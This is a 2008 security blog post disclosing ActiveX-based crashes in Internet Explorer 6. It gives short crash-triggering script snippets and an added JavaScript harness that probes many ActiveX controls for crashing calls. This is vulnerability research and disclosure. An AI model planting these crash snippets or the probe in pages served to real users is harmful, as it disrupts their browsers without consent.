More MSIE 6 Mayhem.
Published on: 2008-07-14 (Unix timestamp 1216038750)
Update: I got a couple of questions from readers about this find, and they are correct. Sorry guys and girls, I did not verify my results, and it seems that it was disclosed before, in a different but similar way, by various bug hunters I did not know about. The most likely outcome is a null pointer dereference resulting in a crash only; heap spraying is not likely to work here, so I have updated my article accordingly. MSIE version I tested: 6.0.2900.2180.xpsp_sp2_rtm 040803-2158, which of course was never patched.
It's been a while, and I got a bit rusty on the ol' browser hacks here and there, mainly because of a lack of time. That doesn't mean I didn't research some browser issues behind the scenes. One of them is the XBM image processing in Firefox, and I found that I cannot exploit it[1]. Which is good for Firefox users! Opera tends toward denial-of-service behavior on the XBM #define w/h header, which might be worth investigating some day. Nevertheless, I reverted a system to run solely Internet Explorer 6 to test some ideas a moment ago. Therefore, I am not sure if these exploits run on MSIE 7 or later.
OK, we are only crashing Internet Explorer 6 with the dreaded ActiveX objects from Microsoft, just to toy with the idea. There have been many variations on exploiting ActiveX, and this is simply another way of abusing it with the most minimal code. I simply wanted a method of crashing Internet Explorer with little means, and that is what the examples below do.
Some compact examples; more variations are probably possible:
<script>
// Repeat the call 33 times (the author's count); any script error is
// swallowed by the try/catch so the loop keeps going.
for(i=0;i<33;i++){
try{
// Instantiate the Microsoft-shipped OutlookExpress.AddressBook control and
// call an Array method (concat) on the returned host object with a
// string argument. On the tested MSIE 6 build this crashes the browser.
foo = new ActiveXObject("OutlookExpress.AddressBook").concat('3'+'3'+'3');
}catch(e){}
}
</script>
<script>
// Same idea with a different Array method (join) and numeric arguments.
for(i=0;i<33;i++){
try{
foo = new ActiveXObject("OutlookExpress.AddressBook").join(1,1,1);
}catch(e){}
}
</script>
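The two loops above are one-offs against one ProgID. The following is an added example, not code from the original post, that turns the same call shape (instantiate a control, call an Array method on the host object inside try/catch, repeat) into a small probe over a list of ProgIDs and method names, recording which controls are creatable at all and which calls return, throw, or never hand control back. The factory is pluggable: inside MSIE you would pass a wrapper around ActiveXObject; the `fakeFactory`, the ProgID `Example.Fake` and the error text it throws are constructed stand-ins so the harness also runs under Node for checking the bookkeeping. A hard crash obviously cannot be recorded by script, so in a real run the absence of a result for a ProgID/method pair is the interesting signal.

```javascript
// Added example (not from the original post): a systematic probe built on the
// same call shape as the two snippets above. `fakeFactory` and the ProgID
// "Example.Fake" are constructed stand-ins so this runs outside MSIE.

var ARRAY_METHODS = ["concat", "join", "slice", "reverse", "sort"];

// Outcomes the harness distinguishes for the last iteration of each call.
var NOT_CREATABLE   = "not-creatable"; // factory threw (unknown ProgID or kill-bitted)
var METHOD_THREW    = "threw";         // call raised a catchable exception
var METHOD_RETURNED = "returned";      // call completed without throwing

function probeActiveX(factory, progIds, methods, iterations) {
  methods = methods || ARRAY_METHODS;
  iterations = iterations || 33;         // same count the original loops use
  var report = {};
  for (var p = 0; p < progIds.length; p++) {
    var id = progIds[p];
    var entry = { creatable: false, methods: {} };
    report[id] = entry;
    for (var m = 0; m < methods.length; m++) {
      var name = methods[m];
      var outcome = METHOD_THREW;
      for (var i = 0; i < iterations; i++) {
        var obj;
        try {
          obj = factory(id);
        } catch (e) {
          outcome = NOT_CREATABLE;     // nothing to call; stop retrying this ProgID
          break;
        }
        entry.creatable = true;
        try {
          // Same call shape as the post: an Array method on a host object.
          obj[name]("3" + "3" + "3");
          outcome = METHOD_RETURNED;
        } catch (e2) {
          outcome = METHOD_THREW;
        }
      }
      entry.methods[name] = outcome;
    }
  }
  return report;
}

// Factory for MSIE; uncomment when running inside the browser.
// function ieFactory(id) { return new ActiveXObject(id); }

// Constructed stand-in factory: knows one hypothetical ProgID whose instance
// exposes only `join`, and throws for everything else, mirroring how
// ActiveXObject throws for unknown or kill-bitted controls.
function fakeFactory(id) {
  if (id !== "Example.Fake") throw new Error("Automation server can't create object");
  return { join: function () { return "joined"; } };
}

var SAMPLE_PROGIDS = ["OutlookExpress.AddressBook", "Example.Fake"];

// Flatten the report into one line per ProgID for logging.
function summarize(report) {
  var lines = [];
  for (var id in report) {
    var e = report[id];
    var names = [];
    for (var n in e.methods) names.push(n + "=" + e.methods[n]);
    lines.push(id + ": creatable=" + e.creatable + " " + names.join(" "));
  }
  return lines;
}

if (typeof module !== "undefined" && require.main === module) {
  console.log(summarize(probeActiveX(fakeFactory, SAMPLE_PROGIDS)).join("\n"));
}
```

Inside IE, call `probeActiveX(ieFactory, yourProgIds)` and write `summarize(...)` into the page between ProgIDs, so that whatever was logged before the browser died tells you which pair to look at; only the outcome of the last iteration is kept per method, since an intermittent return before a throw is not what this probe is after.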
[1] http://mxr.mozilla.org/firefox/source/modules/libpr0n/decoders/xbm/nsXBMDecoder.cpp#254